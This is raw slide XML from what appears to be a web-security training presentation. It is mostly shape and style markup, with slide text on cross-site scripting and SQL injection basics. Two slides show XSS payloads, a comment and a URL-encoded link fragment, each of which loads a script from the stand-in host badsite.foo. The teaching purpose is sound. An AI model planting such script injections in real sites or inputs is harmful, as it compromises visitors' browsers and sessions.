              <a:gd name="connsiteY16" fmla="*/ 1523153 h 1523153"/>
              <a:gd name="connsiteX17" fmla="*/ 1171732 w 4339748"/>
              <a:gd name="connsiteY17" fmla="*/ 1523153 h 1523153"/>
              <a:gd name="connsiteX18" fmla="*/ 542469 w 4339748"/>
              <a:gd name="connsiteY18" fmla="*/ 1523153 h 1523153"/>
              <a:gd name="connsiteX19" fmla="*/ 0 w 4339748"/>
              <a:gd name="connsiteY19" fmla="*/ 1523153 h 1523153"/>
              <a:gd name="connsiteX20" fmla="*/ 0 w 4339748"/>
              <a:gd name="connsiteY20" fmla="*/ 1045898 h 1523153"/>
              <a:gd name="connsiteX21" fmla="*/ 0 w 4339748"/>
              <a:gd name="connsiteY21" fmla="*/ 522949 h 1523153"/>
              <a:gd name="connsiteX22" fmla="*/ 0 w 4339748"/>
              <a:gd name="connsiteY22" fmla="*/ 0 h 152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39748" h="1523153" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="146215" y="-47055"/>
                  <a:pt x="385093" y="52257"/>
                  <a:pt x="585866" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="786639" y="-52257"/>
                  <a:pt x="1013790" y="55727"/>
                  <a:pt x="1171732" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1329674" y="-55727"/>
                  <a:pt x="1501524" y="35495"/>
                  <a:pt x="1584008" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1666492" y="-35495"/>
                  <a:pt x="2026309" y="72631"/>
                  <a:pt x="2213271" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2400233" y="-72631"/>
                  <a:pt x="2491578" y="44078"/>
                  <a:pt x="2625548" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2759518" y="-44078"/>
                  <a:pt x="3066802" y="63282"/>
                  <a:pt x="3254811" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3442820" y="-63282"/>
                  <a:pt x="3540425" y="3434"/>
                  <a:pt x="3797280" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4054135" y="-3434"/>
                  <a:pt x="4081966" y="36745"/>
                  <a:pt x="4339748" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4340456" y="153408"/>
                  <a:pt x="4284578" y="357764"/>
                  <a:pt x="4339748" y="462023"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4394918" y="566282"/>
                  <a:pt x="4339320" y="711625"/>
                  <a:pt x="4339748" y="924046"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4340176" y="1136467"/>
                  <a:pt x="4321093" y="1330472"/>
                  <a:pt x="4339748" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4085253" y="1557382"/>
                  <a:pt x="3872440" y="1465924"/>
                  <a:pt x="3753882" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3635324" y="1580382"/>
                  <a:pt x="3381542" y="1460145"/>
                  <a:pt x="3211414" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3041286" y="1586161"/>
                  <a:pt x="2884147" y="1483386"/>
                  <a:pt x="2712343" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2540539" y="1562920"/>
                  <a:pt x="2403825" y="1514369"/>
                  <a:pt x="2126477" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1849129" y="1531937"/>
                  <a:pt x="1783520" y="1471587"/>
                  <a:pt x="1670803" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1558086" y="1574719"/>
                  <a:pt x="1345263" y="1503891"/>
                  <a:pt x="1171732" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="998201" y="1542415"/>
                  <a:pt x="763250" y="1517391"/>
                  <a:pt x="542469" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="321688" y="1528915"/>
                  <a:pt x="132848" y="1520605"/>
                  <a:pt x="0" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-26225" y="1370583"/>
                  <a:pt x="43699" y="1180003"/>
                  <a:pt x="0" y="1045898"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-43699" y="911793"/>
                  <a:pt x="47461" y="709418"/>
                  <a:pt x="0" y="522949"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-47461" y="336480"/>
                  <a:pt x="50112" y="150900"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="4339748" h="1523153" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="130581" y="-23193"/>
                  <a:pt x="321752" y="8489"/>
                  <a:pt x="412276" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="502800" y="-8489"/>
                  <a:pt x="630430" y="8674"/>
                  <a:pt x="824552" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1018674" y="-8674"/>
                  <a:pt x="1188105" y="39561"/>
                  <a:pt x="1280226" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1372347" y="-39561"/>
                  <a:pt x="1665542" y="14717"/>
                  <a:pt x="1779297" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1893052" y="-14717"/>
                  <a:pt x="2079934" y="21833"/>
                  <a:pt x="2191573" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2303212" y="-21833"/>
                  <a:pt x="2490096" y="56"/>
                  <a:pt x="2603849" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2717602" y="-56"/>
                  <a:pt x="2851330" y="48896"/>
                  <a:pt x="3016125" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3180920" y="-48896"/>
                  <a:pt x="3347912" y="50263"/>
                  <a:pt x="3471798" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3595684" y="-50263"/>
                  <a:pt x="4035361" y="29279"/>
                  <a:pt x="4339748" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4394355" y="240033"/>
                  <a:pt x="4281069" y="395712"/>
                  <a:pt x="4339748" y="507718"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4398427" y="619724"/>
                  <a:pt x="4328195" y="870075"/>
                  <a:pt x="4339748" y="1045898"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4351301" y="1221721"/>
                  <a:pt x="4315176" y="1399572"/>
                  <a:pt x="4339748" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4031572" y="1551155"/>
                  <a:pt x="3908481" y="1469196"/>
                  <a:pt x="3710485" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3512489" y="1577110"/>
                  <a:pt x="3420807" y="1504663"/>
                  <a:pt x="3254811" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3088815" y="1541643"/>
                  <a:pt x="2885679" y="1512362"/>
                  <a:pt x="2755740" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2625801" y="1533944"/>
                  <a:pt x="2378136" y="1519264"/>
                  <a:pt x="2256669" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2135202" y="1527042"/>
                  <a:pt x="1952149" y="1473160"/>
                  <a:pt x="1757598" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1563047" y="1573146"/>
                  <a:pt x="1484576" y="1489512"/>
                  <a:pt x="1215129" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="945682" y="1556794"/>
                  <a:pt x="907571" y="1517581"/>
                  <a:pt x="716058" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="524545" y="1528725"/>
                  <a:pt x="257694" y="1507796"/>
                  <a:pt x="0" y="1523153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-36025" y="1406829"/>
                  <a:pt x="21614" y="1218757"/>
                  <a:pt x="0" y="1000204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-21614" y="781651"/>
                  <a:pt x="2759" y="751925"/>
                  <a:pt x="0" y="538181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-2759" y="324437"/>
                  <a:pt x="27412" y="207166"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="1617156465">
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <ask:type>
                    <ask:lineSketchScribble/>
                  </ask:type>
                </ask:lineSketchStyleProps>
              </a:ext>
            </a:extLst>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="257175" indent="-257175" algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="-342900" algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ED1C24"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Check out this amazing &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>="https://trusted.foo"&gt;website&lt;/a&gt;&lt;script src="https://badsite.foo/hook.js"&gt;&lt;/script&gt;.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto Mono" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D40B396-532C-497E-9447-A2C21DD772DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4945627" y="2901566"/>
            <a:ext cx="3765025" cy="1199179"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3765025"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1199179"/>
              <a:gd name="connsiteX1" fmla="*/ 537861 w 3765025"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1199179"/>
              <a:gd name="connsiteX2" fmla="*/ 1075721 w 3765025"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1199179"/>
              <a:gd name="connsiteX3" fmla="*/ 1500631 w 3765025"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1199179"/>
              <a:gd name="connsiteX4" fmla="*/ 2113793 w 3765025"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1199179"/>
              <a:gd name="connsiteX5" fmla="*/ 2576353 w 3765025"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1199179"/>
              <a:gd name="connsiteX6" fmla="*/ 3151864 w 3765025"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 1199179"/>
              <a:gd name="connsiteX7" fmla="*/ 3765025 w 3765025"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 1199179"/>
              <a:gd name="connsiteX8" fmla="*/ 3765025 w 3765025"/>
              <a:gd name="connsiteY8" fmla="*/ 623573 h 1199179"/>
              <a:gd name="connsiteX9" fmla="*/ 3765025 w 3765025"/>
              <a:gd name="connsiteY9" fmla="*/ 1199179 h 1199179"/>
              <a:gd name="connsiteX10" fmla="*/ 3151864 w 3765025"/>
              <a:gd name="connsiteY10" fmla="*/ 1199179 h 1199179"/>
              <a:gd name="connsiteX11" fmla="*/ 2538703 w 3765025"/>
              <a:gd name="connsiteY11" fmla="*/ 1199179 h 1199179"/>
              <a:gd name="connsiteX12" fmla="*/ 2076142 w 3765025"/>
              <a:gd name="connsiteY12" fmla="*/ 1199179 h 1199179"/>
              <a:gd name="connsiteX13" fmla="*/ 1651232 w 3765025"/>
              <a:gd name="connsiteY13" fmla="*/ 1199179 h 1199179"/>
              <a:gd name="connsiteX14" fmla="*/ 1226322 w 3765025"/>
              <a:gd name="connsiteY14" fmla="*/ 1199179 h 1199179"/>
              <a:gd name="connsiteX15" fmla="*/ 763762 w 3765025"/>
              <a:gd name="connsiteY15" fmla="*/ 1199179 h 1199179"/>
              <a:gd name="connsiteX16" fmla="*/ 0 w 3765025"/>
              <a:gd name="connsiteY16" fmla="*/ 1199179 h 1199179"/>
              <a:gd name="connsiteX17" fmla="*/ 0 w 3765025"/>
              <a:gd name="connsiteY17" fmla="*/ 599590 h 1199179"/>
              <a:gd name="connsiteX18" fmla="*/ 0 w 3765025"/>
              <a:gd name="connsiteY18" fmla="*/ 0 h 119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65025" h="1199179" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="236804" y="-44075"/>
                  <a:pt x="376460" y="12611"/>
                  <a:pt x="537861" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="699262" y="-12611"/>
                  <a:pt x="850277" y="13217"/>
                  <a:pt x="1075721" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1301165" y="-13217"/>
                  <a:pt x="1306461" y="42536"/>
                  <a:pt x="1500631" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1694801" y="-42536"/>
                  <a:pt x="1911217" y="63165"/>
                  <a:pt x="2113793" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2316369" y="-63165"/>
                  <a:pt x="2410876" y="3842"/>
                  <a:pt x="2576353" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2741830" y="-3842"/>
                  <a:pt x="2995874" y="6252"/>
                  <a:pt x="3151864" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3307854" y="-6252"/>
                  <a:pt x="3495825" y="24441"/>
                  <a:pt x="3765025" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3826682" y="267380"/>
                  <a:pt x="3691809" y="380859"/>
                  <a:pt x="3765025" y="623573"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3838241" y="866287"/>
                  <a:pt x="3702753" y="971421"/>
                  <a:pt x="3765025" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3616447" y="1225816"/>
                  <a:pt x="3296135" y="1156335"/>
                  <a:pt x="3151864" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3007593" y="1242023"/>
                  <a:pt x="2795843" y="1171087"/>
                  <a:pt x="2538703" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2281563" y="1227271"/>
                  <a:pt x="2261358" y="1173892"/>
                  <a:pt x="2076142" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1890926" y="1224466"/>
                  <a:pt x="1794299" y="1173918"/>
                  <a:pt x="1651232" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1508165" y="1224440"/>
                  <a:pt x="1340150" y="1169453"/>
                  <a:pt x="1226322" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1112494" y="1228905"/>
                  <a:pt x="908407" y="1156454"/>
                  <a:pt x="763762" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="619117" y="1241904"/>
                  <a:pt x="238552" y="1133174"/>
                  <a:pt x="0" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-59830" y="1071266"/>
                  <a:pt x="32359" y="892542"/>
                  <a:pt x="0" y="599590"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-32359" y="306638"/>
                  <a:pt x="16215" y="225167"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="3765025" h="1199179" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="164064" y="-4324"/>
                  <a:pt x="304444" y="11968"/>
                  <a:pt x="424910" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="545376" y="-11968"/>
                  <a:pt x="705542" y="27712"/>
                  <a:pt x="849820" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="994098" y="-27712"/>
                  <a:pt x="1120113" y="49790"/>
                  <a:pt x="1312380" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1504647" y="-49790"/>
                  <a:pt x="1617779" y="18929"/>
                  <a:pt x="1812591" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2007403" y="-18929"/>
                  <a:pt x="2111826" y="670"/>
                  <a:pt x="2237501" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2363176" y="-670"/>
                  <a:pt x="2529609" y="44308"/>
                  <a:pt x="2662411" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2795213" y="-44308"/>
                  <a:pt x="2919535" y="20562"/>
                  <a:pt x="3087321" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3255107" y="-20562"/>
                  <a:pt x="3541891" y="73282"/>
                  <a:pt x="3765025" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3812961" y="121376"/>
                  <a:pt x="3697002" y="455238"/>
                  <a:pt x="3765025" y="587598"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3833048" y="719958"/>
                  <a:pt x="3732630" y="974197"/>
                  <a:pt x="3765025" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3612359" y="1263510"/>
                  <a:pt x="3431642" y="1171794"/>
                  <a:pt x="3151864" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2872086" y="1226564"/>
                  <a:pt x="2720205" y="1141669"/>
                  <a:pt x="2576353" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2432501" y="1256689"/>
                  <a:pt x="2314294" y="1184636"/>
                  <a:pt x="2076142" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1837990" y="1213722"/>
                  <a:pt x="1733182" y="1198866"/>
                  <a:pt x="1613582" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1493982" y="1199492"/>
                  <a:pt x="1338531" y="1194324"/>
                  <a:pt x="1113372" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="888213" y="1204034"/>
                  <a:pt x="793335" y="1178933"/>
                  <a:pt x="613161" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="432987" y="1219425"/>
                  <a:pt x="166913" y="1168361"/>
                  <a:pt x="0" y="1199179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-62554" y="1066071"/>
                  <a:pt x="30306" y="889044"/>
                  <a:pt x="0" y="599590"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-30306" y="310136"/>
                  <a:pt x="50977" y="224971"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="1617156465">
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <ask:type>
                    <ask:lineSketchScribble/>
                  </ask:type>
                </ask:lineSketchStyleProps>
              </a:ext>
            </a:extLst>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="257175" indent="-257175" algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="-342900" algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ED1C24"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>https://trusted.foo/messages#user=James%3Cscript%20src%3D%22https%3A%2F%2Fbadsite.foo%2Fhook.js%22%3E%3C%2Fscript%3E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3241157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GB" noProof="0" dirty="0"/>
              <a:t>Structured Query Language Injection Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="980349"/>
            <a:ext cx="5117843" cy="3322145"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Injection-type attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Structured Query Language (SQL) statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SELECT, INSERT, DELETE, UPDATE, WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Pass SQL statements to the web application via user input or URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Show or insert database records</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{923B75CC-8461-4A28-996F-EBA656F3915E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5858710" y="1871004"/>
            <a:ext cx="3196514" cy="923330"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="1380292506">
                  <ask:type>
                    <ask:lineSketchScribble/>
                  </ask:type>
                </ask:lineSketchStyleProps>
              </a:ext>
            </a:extLst>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent5"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="-342900" defTabSz="342900">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ED1C24"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600">
